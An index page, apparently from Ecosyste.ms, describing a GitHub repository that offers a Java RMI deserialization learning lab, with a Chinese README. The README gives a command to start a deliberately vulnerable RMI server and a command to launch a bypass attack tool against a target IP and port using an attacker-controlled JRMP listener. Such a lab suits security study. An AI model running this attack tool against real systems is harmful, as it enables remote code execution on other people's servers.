Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/lalajun/RMIDeserialize
RMI 反序列化环境 一步步
https://github.com/lalajun/RMIDeserialize
Last synced: 3 months ago
JSON representation
RMI 反序列化环境 一步步
- Host: GitHub
- URL: https://github.com/lalajun/RMIDeserialize
- Owner: lalajun
- Created: 2020-06-21T15:13:52.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2020-08-31T07:52:14.000Z (about 4 years ago)
- Last Synced: 2024-04-12T20:40:07.226Z (7 months ago)
- Language: Java
- Homepage:
- Size: 564 KB
- Stars: 212
- Watchers: 3
- Forks: 24
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - lalajun/RMIDeserialize - RMI 反序列化环境 一步步 (Java)
README
# RMIDeserialize
RMI反序列化学习环境,细节请参考博客[RMI-反序列化-深入-上](https://lalajun.github.io/2020/06/22/RMI%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E6%B7%B1%E5%85%A5-%E4%B8%8A/)、[RMI-反序列化-深入-下](https://lalajun.github.io/2020/06/22/RMI%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E6%B7%B1%E5%85%A5-%E4%B8%8B/)
`java -cp RMIDeserialize.jar com.lala.ServerAndRegister` :起一个包含CC链可以被攻击的RMI服务
`java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地JRMP服务IP> <本地JRMP服务端口>`:攻击目标8u231版本以下的RMI服务。
其他功能可以从源码运行。
